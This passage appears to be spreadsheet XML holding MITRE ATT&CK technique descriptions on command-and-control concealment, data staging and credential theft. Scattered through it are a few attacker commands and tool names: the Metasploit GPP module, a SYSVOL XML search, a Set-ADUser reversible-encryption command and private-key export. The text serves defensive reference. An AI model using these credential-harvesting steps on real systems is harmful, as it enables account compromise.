Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).
The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.
Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory on the local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Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>Adversaries may stage data collected from multiple systems in a central location or directory on one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In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.
Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as &lt;code&gt;tar&lt;/code&gt; on Linux and macOS or &lt;code&gt;zip&lt;/code&gt; on Windows systems. 
On Windows, &lt;code&gt;diantz&lt;/code&gt; or &lt;code&gt; makecab&lt;/code&gt; may be used to package collected files into a cabinet (.cab) file. &lt;code&gt;diantz&lt;/code&gt; may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) &lt;code&gt;xcopy&lt;/code&gt; on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. 
Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)
In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)
Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`.  Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.</t>
  </si>
  <si>
    <t>Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.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t>
  </si>
  <si>
    <t>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>To disguise the source of malicious traffic, adversaries may chain together multiple proxies.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 A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  
Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) </t>
  </si>
  <si>
    <t>Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting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
For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.</t>
  </si>
  <si>
    <t>Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.</t>
  </si>
  <si>
    <t>Adversaries may use an external proxy to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to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.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a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) 
Adversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)
Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)</t>
  </si>
  <si>
    <t>Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 
Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on * nix-based systems or &lt;code&gt;C:&amp;#92;Users&amp;#92;(username)&amp;#92;.ssh&amp;#92;&lt;/code&gt; on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) 
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.</t>
  </si>
  <si>
    <t>Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
Rather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)
An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. </t>
  </si>
  <si>
    <t>Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
Typically, management services over commonly used ports are used when password spraying.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
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit’s post exploitation module: &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;
* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: &lt;code&gt;dir /s * .xml&lt;/code&gt;
</t>
  </si>
  <si>
    <t>Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
Typically, management services over commonly used ports are used when guessing passwords.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 SNMP (161/UDP and 162/TCP/UDP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</t>
  </si>
  <si>
    <t>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further,  adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) 
Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.</t>
  </si>
  <si>
    <t>Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
Typically, management services over commonly used ports are used when stuffing credentials.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t>
  </si>
  <si>
    <t>An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The &lt;code&gt;AllowReversiblePasswordEncryption&lt;/code&gt; property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:
1. Encrypted password (&lt;code&gt;G$RADIUSCHAP&lt;/code&gt;) from the Active Directory user-structure &lt;code&gt;userParameters&lt;/code&gt;
2. 16 byte randomly-generated value (&lt;code&gt;G$RADIUSCHAPKEY&lt;/code&gt;) also from &lt;code&gt;userParameters&lt;/code&gt;
3. Global LSA secret (&lt;code&gt;G$MSRADIUSCHAPKEY&lt;/code&gt;)
4. Static key hardcoded in the Remote Access Subauthentication DLL (&lt;code&gt;RASSFM.DLL&lt;/code&gt;)
With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)
An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to &lt;code&gt;Set-ADUser -AllowReversiblePasswordEncryption $true&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history"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Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)</t>
  </si>
  <si>
    <t>Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is &lt;code&gt;pam_unix.so&lt;/code&gt;, which retrieves, sets, and verifies account authentication information in &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as &lt;code&gt;pam_unix.so&lt;/code&gt;, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)</t>
  </si>
  <si>
    <t>Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.
Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)
For example, modifying the Windows hosts file (`C:\windows\system32\drivers\etc\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) 
Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) </t>
  </si>
  <si>
    <t>Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.  
Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud 
* Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory 
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD 
AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. 
By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)
In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors)</t>
  </si>
  <si>
    <t>Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 
Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. 
Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)</t>
  </si>
  <si>
